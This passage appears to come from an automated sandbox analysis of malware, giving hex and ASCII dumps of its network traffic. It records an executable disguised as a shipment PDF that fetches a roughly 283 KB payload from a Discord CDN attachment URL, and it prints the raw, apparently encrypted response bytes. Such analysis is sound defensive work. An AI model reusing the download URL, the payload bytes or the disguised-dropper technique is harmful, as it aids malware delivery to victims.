ff 98 df 87 e5 ca d7 dc 35 91 41 57 43 40 d2 f6 2c 22 18 bf fd 73 7f 94 7c b6 a8 8f 9e 5a 49 17 55 67 a3 0f 10 38 6a d6 e0 6c 51
                                                Data Ascii: UH>IUY6]u+lFt*VEAk,3HIsyF$TAqkU@u:&Yy)\*3IBwsT`[&h\ctyXxBID CM%}IxxnL#UAM7X'V<j<B6jw^B!SV5AWC@,"s|ZIUg8jlQ
                                                2021-10-13 18:35:47 UTC93INData Raw: f0 b0 87 b7 3f 0b a9 1d 79 9d a8 e0 e7 80 09 4e 39 ea 76 41 cc cd 3a ba ea a6 20 7b d6 25 bb 91 74 f2 5d ac a1 6e cf c6 de bf e1 63 c9 db c5 a3 b9 b7 f0 81 bb f2 12 4a 77 a6 0a dd e0 39 15 03 3d c0 17 bc 7f 25 a0 fc e0 21 eb 8f 8b 61 0e 7d 9f 2d e5 25 22 d4 0f 1b 84 29 aa ac 12 a2 99 cf 19 5a 59 db d1 e4 68 15 a1 3b b5 f7 2b 6c 1c 74 b6 09 5d e9 0f 3c 99 9e f6 d9 84 ca 8e a7 1b fc cc 75 a6 2d 9a fe d0 5e ff be a3 16 2f 36 85 22 6d 1f 00 1c 97 6e 24 ec da 9a 04 0b ae a2 10 16 f8 c5 c8 38 e2 0a 40 02 4f db 2c 58 db 8d 43 32 12 dc 9d 71 96 e9 e9 a2 a3 25 c7 85 93 73 82 83 fc 63 e4 2b 78 7a 25 8d 1e 91 26 fd 3d 0e 11 85 a8 28 6c 06 0c 3c 0f c1 1e d6 1d a7 ac 29 66 78 21 bd 14 4b 7d d9 f0 2e 2a b6 a0 dc 11 9b 53 7c d2 b0 ac a9 18 a7 18 ff 7c 29 2c c8 b6 14 d0
                                                Data Ascii: ?yN9vA: {%t]ncJw9=%!a}-%")ZYh;+lt]<u-^/6"mn$8@O,XC2q%sc+xz%&=(l<)fx!K}.*S||),
                                                2021-10-13 18:35:47 UTC97INData Raw: a9 3c ac 03 91 20 d4 1b a3 31 78 c9 50 48 ba 6e 9d 26 e7 b4 b5 32 d9 a3 9a 5a 1d 49 38 3e fb 6d 60 8f fd 85 b5 36 9d 4b 3d 18 d7 ef 44 40 4a dd ab 08 86 5b f6 cf fd f3 4e 67 fc f8 60 8a d5 aa bd eb 23 9c b8 5e 65 11 92 fb d1 89 45 c6 31 d1 bc 40 96 e9 b6 94 fc 25 64 d6 80 7b ab 39 eb 5c 64 99 07 94 01 66 76 3f 2b 75 9c db b2 2a 1b 5d fa dc b8 9a bb ff fe 37 20 d3 82 dd 73 96 c6 4c 25 c4 76 35 1d ac 70 01 bc d2 85 7d b9 cc 80 14 28 d5 b5 94 44 89 45 23 e2 e9 ba e0 dd b7 28 fc 54 91 d0 42 bd 2b 11 a8 70 b3 20 34 b0 06 a5 39 98 2b 6b 9f 05 84 93 08 d6 5f e2 ba 8a 4b 21 ef 3f 16 8f 29 4f 74 45 7e 10 70 12 4d 62 40 9e ca 79 4d 0e 14 3d f0 ef db fa 17 00 34 20 36 b5 9d 1a a9 c1 95 f4 ba 93 8f 9d 78 c3 9a fc ed 41 c4 95 14 ea d3 bd 65 68 1d d9 8e 38 0c 78 3c 82
                                                Data Ascii: < 1xPHn&2ZI8>m`6K=D@J[Ng`#^eE1@%d{9\dfv?+u*]7 sL%v5p}(DE#(TB+p 49+k_K!?)OtE~pMb@yM=4 6xAeh8x<
                                                2021-10-13 18:35:47 UTC100INData Raw: e4 07 7f dd 97 4b d6 0c 06 3a 93 bf fa f9 96 1b 9a ff 45 0f f6 e4 93 c6 de 66 66 c6 10 32 dd d8 63 aa 80 01 32 7a 67 e0 21 55 e3 96 77 14 34 98 e7 5d d9 9e 64 09 80 87 ab 36 3b dd 9d 5a f1 7a 24 ec d9 9d 50 7e 2e 2f 49 0d 6c a1 f5 17 2d 49 8c 7d 60 7f 21 67 47 95 85 2f 64 c6 15 be 6e 4a da 50 5c 59 3e 1b 07 9a f0 d2 4f f7 fe 93 68 01 9d c2 79 b6 4b 42 b1 97 7d 5e b3 2b 4b 1c c9 36 ae 84 0c fb a3 3d a8 33 b2 c7 ed a7 69 88 f0 85 28 a1 11 88 78 dc 43 2d 74 04 27 59 79 bf c8 6d 88 28 d0 78 94 8d 4a 58 e5 b9 7e e0 22 f8 33 0c 17 87 45 e3 9f 37 c4 97 70 25 10 ec ac 7c 98 26 49 a3 c1 5b 56 7f 18 a1 e6 5d e7 53 b5 35 32 ad 52 0d ae 8f be cf a4 9a fa d2 40 aa 35 d7 95 65 f9 bb ea 3e 2a 91 72 f0 2a f6 3c 43 21 67 19 43 08 22 cd 26 de 23 90 a6 ae aa 0c 4a eb 0d dd
                                                Data Ascii: K:Eff2c2zg!Uw4]d6;Zz$P~./Il-I}`!gG/dnJP\Y>OhyKB}^+K6=3i(xC-t'Yym(xJX~"3E7p%|&I[V]S52R@5e>*r*<C!gC"&#J
                                                2021-10-13 18:35:47 UTC104INData Raw: 60 6a b8 34 93 dc 75 94 0b 4d 97 ad 41 2d 7c 3a 95 6d 34 e0 bd 70 61 f0 28 9b 7e 88 f9 56 bd a6 8b 2e 2d 9c 2a a0 96 57 9a f4 d7 c0 58 e5 a4 f5 3c 5b b2 18 83 d9 a8 4c 91 e3 e1 6e 44 91 70 b2 80 de b5 8c 72 0c 35 1b 44 8d 67 a0 9f 05 87 43 c5 68 ab 39 1b 40 da 10 1b 84 2c 7b b4 a8 9d 67 65 9b 69 89 41 94 21 40 b8 c2 56 4c bf da ff 1b 27 dd fb 67 14 d6 16 8a f1 4b d5 ad 8c 18 59 cb e9 b6 b9 da fc 8d c9 54 21 47 8e a6 84 7e 75 95 da 47 29 74 49 4f 7f e6 2c 04 f1 14 2d 6c 0b ad 94 88 b8 61 5b 0b 0c 23 5f f1 73 04 1f 40 87 42 11 1f c6 7f b0 b4 9a c5 7d 07 65 f3 4b 81 6c 07 78 fe a1 13 5e 0d cd 90 e6 67 2b 4b 4e 95 53 7f 26 d2 b1 cc 11 a2 bc 7b 45 89 75 47 32 55 a3 4c 23 58 4c a7 1c f0 00 46 16 df 79 47 17 27 59 df 9f 04 29 bb 81 d5 c6 6d a2 5d 76 cf a5 11 eb
                                                Data Ascii: `j4uMA-|:m4pa(~V.-*WX<[LnDpr5DgCh9@,{geiA!@VL'gKYT!G~uG)tIO,-la[#_s@B}eKlx^g+KNS&{EuG2UL#XLFyG'Y)m]v
                                                2021-10-13 18:35:47 UTC108INData Raw: be 42 a5 22 82 11 12 00 1a 75 0c 69 aa 24 a2 96 00 df c1 ef 7b ca c1 64 07 8c 89 55 a9 ad 4b 10 39 5d f9 35 a0 d7 82 1a b1 e4 10 dc 89 7c e1 db 48 83 a5 65 f5 93 67 e5 b2 b0 eb 88 73 f2 ca 54 a4 85 4f e8 00 ae 91 64 75 86 7c e9 bb 26 3e d6 01 f3 2d 3b 1c 8a 41 16 0a 6f 4e 63 4f 54 76 e5 9d 4e b0 bc 48 be 58 77 14 a1 2d b6 d4 c0 60 d2 d1 c9 24 d2 46 00 53 34 f2 41 da 20 37 9a da fd 14 37 37 b1 bc 64 2b 16 00 b0 0d c0 18 7e 13 0d 01 ff 22 e1 94 05 31 12 63 fe cb 04 a1 79 f9 5a 6f 79 38 a2 c5 d3 a0 3d 84 e6 77 a0 b5 81 14 7c 7f ad 50 85 7c f4 5a 51 d0 64 74 23 82 1e e6 75 e7 82 70 27 e8 f4 3a f2 78 33 74 3e 35 99 c9 8a df f3 7f e9 8d 27 09 da 32 8a ac f0 cd 9e ea 7a 2e 80 49 60 66 0c 1a 9b 6c 68 30 a2 8e af 7c 7e 22 ad e1 91 ad d7 8c c3 c3 c1 fb aa cf 1e d9
                                                Data Ascii: B"ui${dUK9]5|HegsTOdu|&>-;AoNcOTvNHXw-`$FS4A 777d+~"1cyZoy8=w|P|ZQdt#up':x3t>5'2z.I`flh0|~"
                                                2021-10-13 18:35:47 UTC112INData Raw: 2e 8c 22 14 f4 a2 c1 98 a1 da ce 58 a6 5a 47 8e c2 bf 7b d4 0a 6f 11 7b 48 03 b6 0d 8c 22 33 90 bb b0 c1 b0 be c4 e8 b8 46 4c 11 00 19 8b bd 7c 21 3e 49 a5 0a a3 3a fd 22 22 62 48 5d 90 a4 7e aa 03 9d 71 71 f8 ad 37 b4 c3 2f 02 04 90 61 9a 87 68 f5 98 98 94 55 4a b1 9b 7f 7b b9 f4 7f 83 a6 4b e7 e0 af 32 d5 0d 1e 79 18 5f f9 3b a1 39 ef b4 b7 59 93 14 6a 35 41 57 b1 07 b2 8b d6 19 1f 36 d9 db a8 56 19 14 9f 83 88 8b e9 c1 5f 13 2a 5a 50 59 f9 75 a5 1d 41 0f d1 65 a7 a2 94 3f 5c a8 d2 97 a5 b8 6a 53 0f 85 a2 9a 0c c3 37 13 8f 15 92 62 fa 29 f0 e1 10 c8 46 77 45 aa f7 34 c1 5d 29 29 2b 46 8c e9 94 0f a3 96 dc 16 96 2d 1d c3 f6 45 29 cd e9 d7 66 45 50 57 ec fb 73 27 8c 43 67 90 06 62 c8 20 3a e3 c6 3b 06 48 80 e0 63 76 85 4f c7 cc 32 bc fd 0a cd fd d7 ee 04
                                                Data Ascii: ."XZG{o{H"3FL|!>I:""bH]~qq7/ahUJ{K2y_;9Yj5AW6V_*ZPYuAe?\jS7b)FwE4]))+F-E)fEPWs'Cgb :;HcvO2
                                                2021-10-13 18:35:47 UTC116INData Raw: ab d9 0c 4f a4 4b 62 72 87 45 b3 50 8c df 8b da 2d 79 ca 8d 35 da 8a bd 35 8d c7 fc 8f 09 41 6a 2e f7 93 f8 00 0f d7 50 2e 20 43 9b 06 9a 6f 91 da 19 35 66 6f 92 2c fe 8e 4d ff 18 f5 85 39 9c 09 3c 8d 06 03 81 bf 30 a0 fa 0b f2 10 b3 fe 84 8a 6d 83 93 87 b1 b7 f9 52 48 27 11 ae db 2c e9 a1 85 dd 54 14 3f 6e c4 f8 5b c6 05 36 9c ad f4 0e 79 29 46 39 15 79 71 bf 0a de 2c 9d 22 a8 bc 43 e0 32 65 70 19 a7 5e 7d b2 a6 ab 46 e9 5d 66 e5 95 16 89 a8 a9 7f c6 de 77 62 75 16 5c 8d 60 6d 9e 7e 9f ca 73 49 40 5f 7c df 88 4c 0e 6e 99 74 94 7e 5a 3b a3 ba bc 96 67 39 53 be 84 66 fa 41 cd 8e 44 b3 8d d4 eb 95 21 40 1e 1a 72 1a 0a 71 46 07 7f ab d8 af 28 28 10 ba d4 d0 8b b7 bf c3 91 05 4b fd 52 22 b3 0e ef 93 38 9d 7e 4a 42 f4 2c 0d 8b 8d ca b9 a3 45 4e 94 7b 2d e8 56
                                                Data Ascii: OKbrEP-y55Aj.P. Co5fo,M9<0mRH',T?n[6y)F9yq,"C2ep^}F]fwbu\`m~sI@_|Lnt~Z;g9SfAD!@rqF((KR"8~JB,EN{-V


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.549733162.159.129.233443C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
                                                TimestampkBytes transferredDirectionData
                                                2021-10-13 18:35:47 UTC120OUTGET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1
                                                User-Agent: aswe
                                                Host: cdn.discordapp.com
                                                Cache-Control: no-cache
                                                2021-10-13 18:35:47 UTC121INHTTP/1.1 200 OK
                                                Date: Wed, 13 Oct 2021 18:35:47 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 283648
                                                Connection: close
                                                CF-Ray: 69daab77ed333248-FRA
                                                Accept-Ranges: bytes
                                                Age: 11417
                                                Cache-Control: public, max-age=31536000
                                                Content-Disposition: attachment;%20filename=Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq
                                                ETag: "0584cd5c8571b60faaa2811123ac81ce"
                                                Expires: Thu, 13 Oct 2022 18:35:47 GMT
                                                Last-Modified: Wed, 13 Oct 2021 15:07:57 GMT
                                                Vary: Accept-Encoding
                                                CF-Cache-Status: HIT
                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                x-goog-generation: 1634137677483270
                                                x-goog-hash: crc32c=+JhllA==
                                                x-goog-hash: md5=BYTNXIVxtg+qooERI6yBzg==
                                                x-goog-metageneration: 1
                                                x-goog-storage-class: STANDARD
                                                x-goog-stored-content-encoding: identity
                                                x-goog-stored-content-length: 283648
                                                X-GUploader-UploadID: ADPycduGriJbFyWO3Ajj_7J6Zp42-vZFeJqDaEKSLbDXSCG_QR3-28T4UU8losd0PhRIFGKcDfjlfEiv-ZVdDLP8AEI
                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                2021-10-13 18:35:47 UTC122INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 62 6d 44 36 53 78 50 67 34 53 58 5a 31 57 54 6f 53 6a 65 4c 6c 44 35 25 32 46 64 54 54 6b 56 73 79 68 76 6d 39 33 53 25 32 46 48 30 72 30 32 46 43 30 6f 37 39 33 36 70 43 48 4a 45 59 39 47 43 59 49 47 55 64 7a 38 46 6f 4e 54 7a 34 79 72 25 32 42 31 71 4b 6f 68 74 38 4d 44 68 4e 78 4a 6d 61 6b 59 46 63 67 77 37 49 36 4c 44 4f 41 49 53 48 6c 31 53 72 71 66 57 34 47 61 41 7a 4f 4e 46 79 32 77 74 4d 59 74 52 6b 4a 4d 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bmD6SxPg4SXZ1WToSjeLlD5%2FdTTkVsyhvm93S%2FH0r02FC0o7936pCHJEY9GCYIGUdz8FoNTz4yr%2B1qKoht8MDhNxJmakYFcgw7I6LDOAISHl1SrqfW4GaAzONFy2wtMYtRkJMQ%3D%3D"}],"group":"cf-nel","max_age":
                                                2021-10-13 18:35:47 UTC122INData Raw: 19 c6 ec b4 32 7a aa 0e a0 08 90 64 f2 4d af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af
                                                Data Ascii: 2zdM*mL5856M7Z_cw S]b)T4o$X*mL5856M7Z_cw S]b)T4o$X*mL5856M7Z_cw S]b)T4o$X
                                                2021-10-13 18:35:47 UTC123INData Raw: 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b
                                                Data Ascii: 9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![
                                                2021-10-13 18:35:47 UTC125INData Raw: 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11
                                                Data Ascii: uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl
                                                2021-10-13 18:35:47 UTC126INData Raw: 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db
                                                Data Ascii: PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2
                                                2021-10-13 18:35:47 UTC127INData Raw: 62 70 6d b2 a2 6c 2e f1 28 ce 79 4c 71 88 7d 5d 7e d8 ee c3 f3 af 67 5c 89 85 55 4b 79 a1 1d 53 70 70 8e 67 49 a5 af 0b 0d 4b 37 ef 24 4d 8f b6 b4 59 67 55 6e da 00 06 ac b1 93 5b e6 9f 77 b1 66 f7 e6 11 b9 24 ec 31 97 68 04 62 a1 46 f5 34 23 4f 5f 5e f9 09 88 fd 56 e0 cd 69 a7 87 f6 36 90 fe 56 95 6e fd 62 7f a1 00 62 bf 34 72 2f e8 7f a1 3e d7 9e b6 19 ca 8e cc 71 7c e7 ae 44 89 d4 62 74 a6 76 ba 26 59 de fe c2 cf 4d 8a 71 e3 95 70 7d 57 ca 8e 6d 83 72 ae e5 3b 8a 55 d8 19 59 66 4e dc ab 5c f3 f3 f0 6a ea 25 bb f1 d8 bd ae a7 fa 65 f1 f5 87 58 bf f4 d2 54 6f 7c 9c c6 ae bb ff 9a fd 26 cb 06 8f b3 5d e0 9d 93 71 73 3e d2 48 5c 5f f8 f6 30 e2 c3 0c 2b d3 10 25 5f ea 09 21 38 67 a1 94 59 98 e9 59 90 42 47 67 e1 40 b2 a4 47 d0 63 4e 10 be ac 91 ca 84 18 25
                                                Data Ascii: bpml.(yLq}]~g\UKySppgIK7$MYgUn[wf$1hbF4#O_^Vi6Vnbb4r/>q|Dbtv&YMqp}Wmr;UYfN\j%eXTo|&]qs>H\_0+%_!8gYYBGg@GcN%
                                                2021-10-13 18:35:47 UTC129INData Raw: 61 ff 71 9f 1f f9 ff 6f 45 cd ca 76 23 53 61 6c 8d 31 ac 1b 60 7f ac b6 8d 93 b2 3f d7 30 d4 12 37 0b a1 8e 2c ca bb 26 cd f0 de 1b d4 f8 51 ba 86 76 1f 49 2a fd bf 29 e8 63 3b a9 3f 06 17 b1 b1 a8 13 91 bd 7d f4 d6 0e 3c 2b 27 2e 69 53 7f e1 bf cb f0 f5 8b 95 ed 92 4a f6 da 17 bd 1e 35 85 17 77 0b e2 21 54 56 6e 0f a7 bf 02 fa 86 db 9c fd e4 c1 60 0c ec 87 1b 5b e9 a2 d7 cb aa 2c 3e 23 bf cf fd 69 bd a3 67 a2 5c 8d bc 4c b6 b3 45 59 b1 60 a7 a2 64 69 97 7e 2c 70 b4 11 60 8e 74 1e cc 73 71 49 f4 35 d7 6e e9 ab 21 41 0a 7b ce 38 41 9b d5 9d 68 19 ef b5 ca 44 60 88 78 21 59 cc 07 38 18 f6 15 01 70 11 b5 2c e0 8e 77 bb 06 fb eb a5 0c 25 ea 77 ff cf 35 b1 d8 0c 22 ca 39 c0 93 e0 e2 94 13 b6 a2 94 c7 89 39 29 b5 8d aa 92 e5 ae dd 98 fc 84 0a a5 eb b6 af 32 f1
                                                Data Ascii: aqoEv#Sal1`?07,&QvI*)c;?}<+'.iSJ5w!TVn`[,>#ig\LEY`di~,p`tsqI5n!A{8AhD`x!Y8p,w%w5"99)2
                                                2021-10-13 18:35:47 UTC130INData Raw: 1b 1c d3 9b 64 06 b3 a4 0f 7b 02 4f ca 6e 0e 12 40 e6 0c e8 9b 24 de 1a dd 77 d1 86 95 bf 21 08 0c 2a ea 19 50 4a bf 1f ea 89 54 46 ba ee a1 6e e7 60 d5 6c 11 a4 9f 18 31 70 1b 91 8c 37 0a 17 b5 7b f0 82 59 10 99 c4 44 bc 45 82 04 3d 94 27 81 0f ad 27 60 46 68 db 1d 99 90 0b bb c7 f0 9d a9 cf 3e 57 6e bd d1 eb a2 2a 55 5c 1c 00 e1 28 e7 bd db 15 91 51 12 f1 f0 33 04 14 20 52 bb 29 18 fe 07 10 34 9c fa 5a b5 84 b8 82 8a 22 d0 7a 36 f3 e7 12 ef 86 79 2e f7 41 3d f0 9c bd 5f 37 be b9 c8 67 ff 03 2e 58 85 8c 6e fb 6a 10 34 e7 66 b5 85 8d b6 4f cb e1 a8 a8 f1 3f 42 7b 49 f2 c4 55 d2 f5 09 c7 77 60 82 e4 3d 17 aa 70 f0 26 e9 65 08 d2 7c 33 19 72 d6 ca 9e 57 6b 57 d5 92 ff be f2 74 ed 88 25 94 fc fd 64 ec b2 35 7d 63 15 6a 0a 0a 06 ed 0d f0 16 f2 7b 76 38 99 73
                                                Data Ascii: d{On@$w!*PJTFn`l1p7{YDE=''`Fh>Wn*U\(Q3 R)4Z"z6y.A=_7g.Xnj4fO?B{IUw`=p&e|3rWkWt%d5}cj{v8s
                                                2021-10-13 18:35:47 UTC131INData Raw: f1 ab 96 43 27 60 8b 3c a5 b3 e6 ca 84 53 cd e7 95 09 bb 23 94 50 cf 61 f8 c3 a5 ab 04 33 c9 0d 2a 40 93 70 ba 19 74 e6 ef fd e6 82 25 4b 80 ba 03 51 09 74 9e 10 32 f9 60 9e 6a 1d 89 fb ee 6e 0e 3a 20 a2 9b 7e f6 64 f4 78 3f 02 3f 57 b8 15 65 4c 47 af 2a e8 14 2c 87 ad ef fc 15 18 2b 75 7c 6c 9a 4b f2 23 86 69 8d 52 c5 77 ec 0e f8 3e 59 7a 23 59 85 80 6b 0f 6d 62 a7 8b 5b f7 ce 7a 9f 4e 92 15 77 0c 21 4c 9c 4e 79 0d 73 26 2d d5 92 ff 07 1a e4 17 75 77 6a 9a e1 a1 0b f0 64 f9 8d bf 0f 0a 0a 06 0d 65 06 7f 7f 00 da 80 2c e9 41 74 cf 46 72 fb cf 62 76 38 77 b9 b3 e2 e2 95 ff cc 6d 93 f0 25 04 65 38 35 9e 11 b1 2c 6b 09 40 d5 41 cc e0 87 48 b5 e5 fd 6c 07 5d 01 23 c2 40 85 69 35 07 37 d6 e9 1c 6f 9b 7f d0 42 6b 28 37 bd 6a 9b 7a 2a 5f 19 15 4d e0 c2 c3 7c 27
                                                Data Ascii: C'`<S#Pa3*@pt%KQt2`jn: ~dx??WeLG*,+u|lK#iRw>Yz#Ykmb[zNw!LNys&-uwjde,AtFrbv8wm%e85,k@AHl]#@i57oBk(7jz*_M|'
                                                2021-10-13 18:35:47 UTC133INData Raw: 5c be fa 20 dc 17 bf 50 38 43 61 26 59 07 99 61 f7 af 2b 37 c3 12 de c0 5f e5 a7 65 0f 50 90 3f f9 93 6b 8f 5d 1f 1a c2 4a 73 74 ce 66 74 0b e8 09 63 6d 5f 1a 17 ba 46 b7 62 a1 66 d6 de a7 df 98 e7 ab 3d 41 73 4d f7 b0 6f 81 a5 10 8a c0 64 37 db 72 c2 52 5c 78 3d 90 61 43 ee 75 0d b8 55 d4 fa 2a 01 3c 4a 54 e5 b4 b1 36 bc 1e 62 e1 64 c6 f5 55 cf e8 73 3b 11 20 12 88 5a 41 3d 1b 43 e1 7d f6 12 df 32 f8 d8 0b 3f b6 a7 b7 f5 b7 99 67 e5 b6 1c 3d b8 87 96 0f 0f a0 8d 5c b0 da 4c 5e b6 0c 80 37 0a 1c 0d ac 57 7d 6d 6e 1e c4 4a bf 0a 4d b7 7c ed fb 61 eb a2 82 cb 16 b2 cd 3c 72 15 ab 3b 19 2f 22 a1 6f 45 cd ed 5e 65 f2 a4 7e c8 b5 ee 7a 32 ee d9 9a 36 a8 62 1c 03 37 00 17 bb c6 0a c1 6c 57 07 77 a7 17 a4 90 5f 27 d7 81 7f 09 82 24 c3 cd 0a ce 99 ed 88 77 98 eb
                                                Data Ascii: \ P8Ca&Ya+7_eP?k]Jstftcm_Fbf=AsMod7rR\x=aCuU*<JT6bdUs; ZA=C}2?g=\L^7W}mnJM|a<r;/"oE^e~z26b7lWw_'$w
                                                2021-10-13 18:35:47 UTC134INData Raw: 19 fb 81 a0 85 49 06 65 4a 03 9c f6 d5 84 fd da e2 20 d0 79 b1 cf c3 8f 49 2a 0e b0 16 e3 a0 29 cb ae a6 a4 bd 76 8d 73 54 03 85 48 b3 2c 53 75 33 10 37 1f 71 21 ec 30 d4 e2 4c 17 4c f0 ca 73 d5 93 72 03 93 81 0e 87 d4 19 4b 19 ab 9c f0 d7 95 7a 1c 53 7e 71 9b 7a 74 02 07 9b 6c b1 99 7b ba 4d 3f 30 1c 66 63 fc e4 28 d3 61 bc 1f 44 b6 f8 d6 eb 54 d5 8f 52 40 b4 55 6f 82 3f 05 92 c0 c3 f0 8b 43 38 32 3f 6a 2e 44 6d ab cc e9 87 80 12 9b 33 87 c5 99 5d 09 40 ae 11 0f 15 0c 27 de 1f bc 6a 14 18 0a 2b df 09 57 0e 26 5c fa c7 fb 63 ff b2 68 1c 9b 6d 85 45 28 f4 49 87 22 31 37 1e 23 4e 97 bb d0 c2 f8 db 80 22 dd 58 99 79 15 1d 54 59 c2 5b fe e3 40 ca 7f 0d e9 b3 86 d0 a1 d6 16 8f ca 68 06 0e 32 36 4d 35 ed d1 e8 2d 68 1f 43 3c 71 d5 95 83 00 1b ae d6 18 85 51 1f
                                                Data Ascii: IeJ yI*)vsTH,Su37q!0LLsrKzS~qztl{M?0fc(aDTR@Uo?C82?j.Dm3]@'j+W&\chmE(I"17#N"XyTY[@h26M5-hC<qQ
